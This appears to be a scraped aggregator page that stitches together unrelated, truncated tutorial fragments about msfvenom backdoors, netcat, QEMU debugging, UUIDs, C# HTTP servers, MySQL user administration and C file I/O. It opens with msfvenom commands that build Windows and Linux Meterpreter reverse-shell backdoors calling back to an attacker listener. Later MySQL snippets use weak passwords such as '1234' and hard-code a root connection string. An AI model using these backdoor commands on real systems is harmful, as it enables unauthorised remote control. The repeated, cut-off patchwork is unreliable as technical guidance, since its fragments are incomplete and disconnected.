The backdoor in this chapter has the followingWindows--Using the module "WINDOWS/METERPRETER/REVERSE_TCP"Command: msfvenom-p windows/meterpreter/reverse_tcp lhost=192.168.2.146 lport=44444 X >test.exeRefer to "09-metasploit's My Remote control software"Linux--Using the module "LINUX/X86/METERPRETER/SHELL_RVERSE_TCP"Command: msfvenom-p linux/x86/meterpreter/reverse_tcp lhost=192.168.2.146 lport=1234 X >textReference article: http://xiao106347.blog.163.
description of the 1.10 version on red Flag DC Server 5.0. Assume two server information:Reference server1:192.168.228.221 server2:192.168.228.222second, the common use of 1, remote copy files from Server1 copy files to Server2. Need to first on the Server2, with NC activation monitoring, Server2 run:references [[email protected] tmp]# NC-LP 1234 > Install.logRun on Server1:references [[email protected] ~]# ll install.log-rw-r--r--1 root root 39693 D
for-gdb tcp::1234 establishes a GDB server on port 1234If you do not want to use port 1234, you can use-GDB tcp:xxxx to replace the-s optionOpen another Shell windowgdb(gdb) file Linux-3.18. 6/vmlinux # Load symbol table before Targe remote in GDB interface (GDB) Target remote:1234 # Establish a connection between GDB and Gdbserver, press C to keep Linux on qem
, it is a network application debug parser, because it can create a variety of different types of network connections as needed.The usual version of the Linux distribution is Netcat (NC), even in the rescue mode CD, which is provided by BusyBox with a simple version of the NC tool. But different versions, the use of their parameters slightly different. NetCat Official Address: http://netcat.sourceforge.net/references [[email protected] ~]# cat/etc/asianux-release asianux Release 2.0 (Trinity SP2
: The UUID is created from 6 integer domains totaling 128 bits (32 bits as Time_low segment, 16 bits as Time_mid segment, 16 bits as time_hi_version segment, 8 bits as Clock_seq_hi_ Variant segment, 8 bits as Clock_seq_low segment, 48 bits as node segment); int: Directly specifying an integer length of 128 bits to create a UUID object; version: (optional) Specify the versions of the UUID, from 1 to 5, once this parameter is specified, the resulting UUID will have its own variant (variant) and
Take the multithreaded Programming learning notes above--using asynchronous IOSecond, write an asynchronous HTTP server and clientThis section shows how to write a simple asynchronous HTTP server.1. The program code is as follows.usingSystem;usingSystem.Collections.Generic;usingSystem.IO;usingSystem.Linq;usingSystem.Net;usingSystem.Net.Http;usingSystem.Text;usingSystem.Threading.Tasks;namespacethreadiodemo{classProgram {Static voidMain (string[] args) {Console.WriteLine ("--Create a simple Web
; */
1234
/*!* kan.56.com - v1.1 (2013-03-08T15:30:32+0800)* Copyright 2005-2013 56.com*/
If some open source components are included in the file, they must be described in the file comments. For example:
1234567
/*!* jRaiser 2 Javascript Library* sizzle - v1.9.1 (2013-03-15T10:07:24+0800)* http://jraiser.org/ | Released under MIT license** Include sizzle (http://sizzlejs.com/)*/
(file remote copy)On Server1, use the NC command to create a server side: Server1 $ nc-l 1234 On Server2, use NC as the client to connect to the Server1 Server2 $ NC Server1 IP Address 1234 This establishes a simple C/s connection, enter any content in the Server2, can be accepted in the Server1 (synchronous display). The above example can be modified to implement remote file transmission Server1 $ nc-l
has permission to manipulate the top database.
2. Model Definition Database connection
If you need to use a different database connection account or need to connect to different types of databases, you can define the connection attribute directly in the model class and automatically connect to the specified database when you manipulate the model class. For example:
protected $connection = ' mysql://root:1234@localhost:3306/thinkphp ';
MySQL
Method Two:
Open the admin tools service and find the MySQL service.Start the service by right-clicking on the startup or clicking on the left side of the boot directly.
6 when the installation is complete, the root account default password is blank, the password can be modified to the specified password. such as: 123456
C:>mysql–uroot
mysql>show databases;
Mysql>use MySQL;
Mysql>update user SET Password=password ("123456") WHERE user= ' root ';
Mysql>flush privileges;
mysql>qu
MySQL add users, create a new database, user authorization, delete users, modify password (note that each line is followed by the following; Represents the end of a command statement):
1. New User
Login MySQL:@>mysql-u root-p
@> Password
To create a user:mysql> INSERT INTO Mysql.user (Host,user,password) VALUES ("localhost", "Test", Password ("1234"));
This creates a user named: Test Password: 1234.
N
session, and the max_dump_file_size parameters.
Enable Trace Event 10046
1. In the global settings
Modifying initialization parameters
EVENT = "10046 Trace name Context forever, Level 8"
2. In the current session settings
Alter session SET Events ' 10046 Trace name Context forever, Level 8 ';
Alter session SET Events ' 10046 Trace name context off ';
3. Session settings for other users
Tag: the permission table indicates that the computer cannot log on Ges Mys NoMySQL add user, new database, user authorization, delete user, change password (note that each line followed by A; indicates that a command statement ends):1. Create a new user1.1 Log in to MySQL:@>mysql-u root-p@> Password1.2 Create User:mysql> INSERT INTO Mysql.user (Host,user,password) VALUES ("localhost", "Test", Password ("1234"));This creates a user named: Test with a
Read and write locationsSeek_end 2 File Trailer
Example: Fseek (fp,1234l,seek_cur);//Move the Read and write position backward from the current position 1234 bytes (l suffix indicates a long integer)
Fseek (fp,0l,2);//Move the read-write position to the end of the file
6.fputs ()Write a string into the stream, prototype int fputs (const char *s, FILE *stream);
Example: Fputs ("I Love You", FP);
7.fgets ()Reads a line or a specified character from the
MySQL Create, delete userMySQL add user, new database, user authorization, delete user, change password (note that each line followed by A; indicates that a command statement ends):1. Create a new userLog in to MySQL:@>mysql-u root-p@> PasswordTo create a user:mysql> INSERT INTO Mysql.user (Host,user,password) VALUES ("localhost", "Test", Password ("1234"));This creates a user named: Test with a password of: 1234
password that knows test2, and he cannot access the number directly from the Internet.Mysql> Grant Select,insert,update,delete on book.* to [e-mail protected] identified by "ABC";If you do not want to test2 have a password, you can call another command to erase the password.Mysql> Grant Select,insert,update,delete on book.* to [e-mail protected] identified by "";MySQL add user, new database, user authorization, delete user, change password (note that each line followed by A; indicates that a co
MySQL add user, new database, user authorization, delete user, change password (note that each line followed by A; indicates that a command statement ends):1. Create a new user1.1 Log in to MySQL:@>mysql-u root-p@> Password1.2 Create User:mysql> INSERT INTO Mysql.user (Host,user,password) VALUES ("localhost", "Test", Password ("1234"));This creates a user named: Test with a password of: 1234.Note: "localhos
Show DATABASES can display all the databases,Show TABLES will display all the data sheets,Show all users in MySQL1. Log in to the databaseFirst of all, you need to log in to the database using the following command, note that must be root user Oh ~# # Mysql-u Root-p2. Querying user TablesIn MySQL in fact there is a built-in database named MySQL , the database is stored in some MySQL data, such as users, permissions information, stored procedures, and so on, we can use the following simple query
Tags: ownership specifies ESC Java 2.3 table dump. SQL DateMySQL add user, new database, user authorization, delete user, change password (note that each line followed by A; indicates that a command statement ends): 1. Create a new user 1.1 Log in to MySQL: @>mysql-u root-p @> Password 1.2 Create User: mysql> INSERT INTO Mysql.user (Host,user,password) VALUES ("localhost", "Test", Password ("1234")); This creates a user named: Test with a password of:
Tags: new user let permission des scribe input password nbsp from IDEMySQL add user, new database, user authorization, delete user, change password (note that each line followed by A; indicates that a command statement ends): 1. Create a new user 1.1 Log in to MySQL: @>mysql-u root-p @> Password 1.2 Create User: mysql> INSERT INTO Mysql.user (Host,user,password) VALUES ("localhost", "Test", Password ("1234")); This creates a user named: Test with a pa
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion;
products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the
content of the page makes you feel confusing, please write us an email, we will handle the problem
within 5 days after receiving your email.
If you find any instances of plagiarism from the community, please send an email to:
info-contact@alibabacloud.com
and provide relevant evidence. A staff member will contact you within 5 working days.